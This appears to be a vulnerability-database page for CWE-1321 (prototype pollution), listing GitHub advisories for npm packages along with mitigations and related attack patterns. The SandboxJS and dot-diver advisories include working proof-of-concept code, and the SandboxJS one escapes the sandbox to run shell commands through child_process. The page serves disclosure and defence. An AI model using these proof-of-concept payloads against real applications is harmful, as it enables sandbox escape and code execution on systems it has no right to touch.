Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

781 vulnerabilities reference this CWE, most recent first.

GHSA-9MX2-PRFP-8HQP

Vulnerability from github – Published: 2021-05-10 18:38 – Updated: 2021-04-21 20:37
VLAI
Summary
Prototype Pollution in simpl-schema
Details

This affects the package simpl-schema before 1.10.2. Attacker controlled input into a schema could result in remote code execution within the scope of the surrounding application.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "simpl-schema"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7742"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-21T20:37:29Z",
    "nvd_published_at": "2020-10-07T09:15:00Z",
    "severity": "HIGH"
  },
  "details": "This affects the package simpl-schema before 1.10.2. Attacker controlled input into a schema could result in remote code execution within the scope of the surrounding application.",
  "id": "GHSA-9mx2-prfp-8hqp",
  "modified": "2021-04-21T20:37:29Z",
  "published": "2021-05-10T18:38:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7742"
    },
    {
      "type": "WEB",
      "url": "https://github.com/longshotlabs/simpl-schema/commit/50128841fa7fc2d137c36a397054279144caea3d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/longshotlabs/simpl-schema/releases/tag/1.10.2"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-SIMPLSCHEMA-1016157"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in simpl-schema"
}

GHSA-9P4G-CJCF-Q3X2

Vulnerability from github – Published: 2022-03-17 00:00 – Updated: 2022-03-23 00:00
VLAI
Details

The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-43956"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-16T01:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability.",
  "id": "GHSA-9p4g-cjcf-q3x2",
  "modified": "2022-03-23T00:00:35Z",
  "published": "2022-03-17T00:00:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43956"
    },
    {
      "type": "WEB",
      "url": "https://jira.atlassian.com/browse/CRUC-8531"
    },
    {
      "type": "WEB",
      "url": "https://jira.atlassian.com/browse/FE-7395"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9P4W-FQ8M-2HP7

Vulnerability from github – Published: 2026-02-02 20:17 – Updated: 2026-02-03 16:13
VLAI
Summary
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
Details

Summary

SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.

Details

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.

PoC

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;

console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`
sb.compile(payload)().run();

Impact

Prototype Pollution -> RCE

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.26"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25142"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-02T20:17:39Z",
    "nvd_published_at": "2026-02-02T23:16:09Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nSandboxJS does not properly restrict `__lookupGetter__` which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.\n\n### Details\n\nhttps://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398\n\nThe Object prototype which contains `__lookupGetter__` is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.\n\n### PoC\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nlet getProto = Object.toString.__lookupGetter__(\"__proto__\")\nlet m = getProto.call(new Map());\nm.has = isFinite;\n\nconsole.log(\n  isFinite.constructor(\n    \"return process.getBuiltinModule(\u0027child_process\u0027).execSync(\u0027ls -lah\u0027).toString()\",\n  )(),\n);`\nsb.compile(payload)().run();\n```\n\n### Impact\nPrototype Pollution -\u003e RCE",
  "id": "GHSA-9p4w-fq8m-2hp7",
  "modified": "2026-02-03T16:13:28Z",
  "published": "2026-02-02T20:17:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-9p4w-fq8m-2hp7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25142"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/commit/75c8009db32e6829b0ad92ca13bf458178442bd3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SandboxJS Vulnerable to Prototype Pollution -\u003e Sandbox Escape -\u003e RCE"
}

GHSA-9PGH-QQPF-7WQJ

Vulnerability from github – Published: 2022-10-11 20:42 – Updated: 2022-11-08 19:35
VLAI
Summary
Withdrawn: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in @xmldom/xmldom and xmldom
Details

Withdrawn

This advisory has been withdrawn because the maintainers of @xmldom/xmldom and multiple third parties disputed the validity of the issue. Attempts to create or replicate a proof of concept have been unsuccessful.

Original Description

Impact

A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package.

Patches

Update to @xmldom/xmldom@~0.7.6, @xmldom/xmldom@~0.8.3 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.2 (dist-tag next).

Workarounds

None

References

https://github.com/xmldom/xmldom/pull/437

For more information

If you have any questions or comments about this advisory: * Email us at security@xmldom.org * Add information to https://github.com/xmldom/xmldom/issues/436

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.8.0"
            },
            {
              "fixed": "0.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.9.0-beta.1"
            },
            {
              "fixed": "0.9.0-beta.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.9.0-beta.1"
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-37616"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-10-11T20:42:57Z",
    "nvd_published_at": "2022-10-11T05:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "## Withdrawn\n\nThis advisory has been withdrawn because the maintainers of `@xmldom/xmldom` and multiple third parties disputed the validity of the issue. Attempts to create or replicate a proof of concept have been unsuccessful.\n\n## Original Description\n\n### Impact\nA prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package.\n\n### Patches\nUpdate to `@xmldom/xmldom@~0.7.6`, `@xmldom/xmldom@~0.8.3` (dist-tag `latest`) or `@xmldom/xmldom@\u003e=0.9.0-beta.2` (dist-tag `next`).\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/xmldom/xmldom/pull/437\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at security@xmldom.org\n* Add information to https://github.com/xmldom/xmldom/issues/436\n",
  "id": "GHSA-9pgh-qqpf-7wqj",
  "modified": "2022-11-08T19:35:06Z",
  "published": "2022-10-11T20:42:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-9pgh-qqpf-7wqj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37616"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/issues/436"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/issues/436#issuecomment-1319412826"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/issues/436#issuecomment-1327776560"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/pull/437"
    },
    {
      "type": "WEB",
      "url": "https://dl.acm.org/doi/abs/10.1145/3488932.3497769"
    },
    {
      "type": "WEB",
      "url": "https://dl.acm.org/doi/pdf/10.1145/3488932.3497769"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xmldom/xmldom"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/blob/bc36efddf9948aba15618f85dc1addfc2ac9d7b2/lib/dom.js#L1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/blob/bc36efddf9948aba15618f85dc1addfc2ac9d7b2/lib/dom.js#L3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md#076"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00023.html"
    },
    {
      "type": "WEB",
      "url": "http://users.encs.concordia.ca/~mmannan/publications/JS-vulnerability-aisaccs2022.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Withdrawn: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in @xmldom/xmldom and xmldom",
  "withdrawn": "2022-11-08T19:35:06Z"
}

GHSA-9QM3-6QRR-C76M

Vulnerability from github – Published: 2025-07-31 15:35 – Updated: 2025-07-31 19:28
VLAI
Summary
@nyariv/sandboxjs has Prototype Pollution vulnerability that may lead to RCE
Details

A prototype pollution vulnerability exists in @nyariv/sandboxjs versions <= 0.8.23, allowing attackers to inject arbitrary properties into Object.prototype via crafted JavaScript code. This can result in a denial-of-service (DoS) condition or, under certain conditions, escape the sandboxed environment intended to restrict code execution. The vulnerability stems from insufficient prototype access checks in the sandbox’s executor logic, particularly in the handling of JavaScript function objects returned.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-34146"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-31T19:28:27Z",
    "nvd_published_at": "2025-07-31T15:15:36Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution vulnerability exists in @nyariv/sandboxjs versions \u003c= 0.8.23, allowing attackers to inject arbitrary properties into Object.prototype via crafted JavaScript code. This can result in a denial-of-service (DoS) condition or, under certain conditions, escape the sandboxed environment intended to restrict code execution. The vulnerability stems from insufficient prototype access checks in the sandbox\u2019s executor logic, particularly in the handling of JavaScript function objects returned.",
  "id": "GHSA-9qm3-6qrr-c76m",
  "modified": "2025-07-31T19:28:27Z",
  "published": "2025-07-31T15:35:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34146"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/issues/31"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/Hagrid29/9df27829a491080f923c4f6b8518d7e3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/@nyariv/sandboxjs"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/nyariv-sandboxjs-prototype-pollution-sandbox-escape-dos"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@nyariv/sandboxjs has Prototype Pollution vulnerability that may lead to RCE"
}

GHSA-9QRG-H9G8-C65Q

Vulnerability from github – Published: 2020-09-04 15:14 – Updated: 2020-08-31 18:55
VLAI
Summary
Prototype Pollution in deep-setter
Details

All versions of deep-setter are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "deep-setter"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:55:28Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "All versions of `deep-setter` are vulnerable to prototype pollution. The package does not restrict the modification of an Object\u0027s prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
  "id": "GHSA-9qrg-h9g8-c65q",
  "modified": "2020-08-31T18:55:28Z",
  "published": "2020-09-04T15:14:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1333"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Prototype Pollution in deep-setter"
}

GHSA-9RHG-254W-FH9X

Vulnerability from github – Published: 2025-03-28 21:30 – Updated: 2025-03-31 15:58
VLAI
Summary
Redoc Prototype Pollution via `Module.mergeObjects` Component
Details

A prototype pollution in the component Module.mergeObjects (redoc/bundles/redoc.lib.js:2) of redoc <= 2.2.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "redoc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-57083"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-31T15:58:51Z",
    "nvd_published_at": "2025-03-28T21:15:17Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution in the component Module.mergeObjects (redoc/bundles/redoc.lib.js:2) of redoc \u003c= 2.2.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
  "id": "GHSA-9rhg-254w-fh9x",
  "modified": "2025-03-31T15:58:51Z",
  "published": "2025-03-28T21:30:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57083"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Redocly/redoc/issues/2499"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Redocly/redoc/pull/2638"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Redocly/redoc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Redoc Prototype Pollution via `Module.mergeObjects` Component"
}

GHSA-9V98-6G37-X9G6

Vulnerability from github – Published: 2026-06-26 21:03 – Updated: 2026-06-26 21:03
VLAI
Summary
deepstream is vulnerable to prototype pollution
Details

Impact

Prototype pollution in deepstream server v <=10.0.4. Potential privilege escalation from any authenticated user with write permission to any record.

Patches

Yes, upgrade to v10.0.5

Workarounds

Filter out all messages containing the path __proto__, constructor, prototype, before they reach the server's message pipeline

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@deepstream/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-49252"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T21:03:59Z",
    "nvd_published_at": "2026-06-18T21:16:29Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nPrototype pollution in deepstream server v \u003c=10.0.4. Potential privilege escalation from any authenticated user with write permission to any record.\n\n### Patches\nYes, upgrade to v10.0.5\n\n### Workarounds\nFilter out all messages containing the path `__proto__`, `constructor`, `prototype`, **before they reach the server\u0027s message pipeline**",
  "id": "GHSA-9v98-6g37-x9g6",
  "modified": "2026-06-26T21:03:59Z",
  "published": "2026-06-26T21:03:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/deepstreamIO/deepstream.io/security/advisories/GHSA-9v98-6g37-x9g6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49252"
    },
    {
      "type": "WEB",
      "url": "https://github.com/deepstreamIO/deepstream.io/commit/54b8e2958a98df444b5b5d9a66e22872afd84e44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/deepstreamIO/deepstream.io"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "deepstream is vulnerable to prototype pollution"
}

GHSA-9W5F-MW3P-PJ47

Vulnerability from github – Published: 2023-11-03 19:03 – Updated: 2023-11-06 19:34
VLAI
Summary
Prototype Pollution(PP) vulnerability in setByPath
Details

Summary

There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.

Details

//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277

// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
  objectToSet[lastKey] = value

In this code, there is no validation for Prototpye Pollution.

PoC

import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

Impact

It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.

Credits

Team : NodeBoB

최지혁 ( Jihyeok Choi )

이동하 ( Lee Dong Ha of ZeroPointer Lab )

강성현    ( kang seonghyeun )

박성진    ( sungjin park )

김찬호    ( Chanho Kim )

이수영    ( Lee Su Young )

김민욱    ( MinUk Kim )

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@clickbar/dot-diver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-45827"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-03T19:03:40Z",
    "nvd_published_at": "2023-11-06T18:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThere is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.\n\n### Details\n```javascript\n//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277\n\n// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access\n  objectToSet[lastKey] = value\n```\nIn this code, there is no validation for Prototpye Pollution.\n\n### PoC\n```javascript\nimport { getByPath, setByPath } from \u0027@clickbar/dot-diver\u0027\n\nconsole.log({}.polluted); // undefined\nsetByPath({},\u0027constructor.prototype.polluted\u0027, \u0027foo\u0027);\nconsole.log({}.polluted); // foo\n```\n\n### Impact\nIt is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.\n\n### Credits\nTeam : NodeBoB\n\n\ucd5c\uc9c0\ud601   ( Jihyeok Choi )\n\n\uc774\ub3d9\ud558\u2003( Lee Dong Ha of ZeroPointer Lab )\n\n\uac15\uc131\ud604 \u00a0\u00a0\u00a0( kang seonghyeun )\n\n\ubc15\uc131\uc9c4\u00a0\u00a0\u00a0 ( sungjin park )\n\n\uae40\ucc2c\ud638\u00a0\u00a0\u00a0 ( Chanho Kim )\n\n\uc774\uc218\uc601 \u00a0\u00a0\u00a0( Lee Su Young )\n\n\uae40\ubbfc\uc6b1 \u00a0\u00a0\u00a0( MinUk Kim )\n",
  "id": "GHSA-9w5f-mw3p-pj47",
  "modified": "2023-11-06T19:34:19Z",
  "published": "2023-11-03T19:03:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45827"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/clickbar/dot-diver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution(PP) vulnerability in setByPath"
}

GHSA-9WCG-JRWF-8GG7

Vulnerability from github – Published: 2020-08-05 14:53 – Updated: 2022-05-04 02:19
VLAI
Summary
Prototype Pollution in express-fileupload
Details

This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "express-fileupload"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7699"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-03T21:20:00Z",
    "nvd_published_at": "2020-07-30T09:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.",
  "id": "GHSA-9wcg-jrwf-8gg7",
  "modified": "2022-05-04T02:19:36Z",
  "published": "2020-08-05T14:53:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7699"
    },
    {
      "type": "WEB",
      "url": "https://github.com/richardgirges/express-fileupload/issues/236"
    },
    {
      "type": "WEB",
      "url": "https://github.com/richardgirges/express-fileupload/pull/237"
    },
    {
      "type": "WEB",
      "url": "https://github.com/richardgirges/express-fileupload/commit/db495357d7557ceb5c034de91a7a574bd12f9b9f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/richardgirges/express-fileupload"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200821-0003"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-EXPRESSFILEUPLOAD-595969"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in express-fileupload"
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.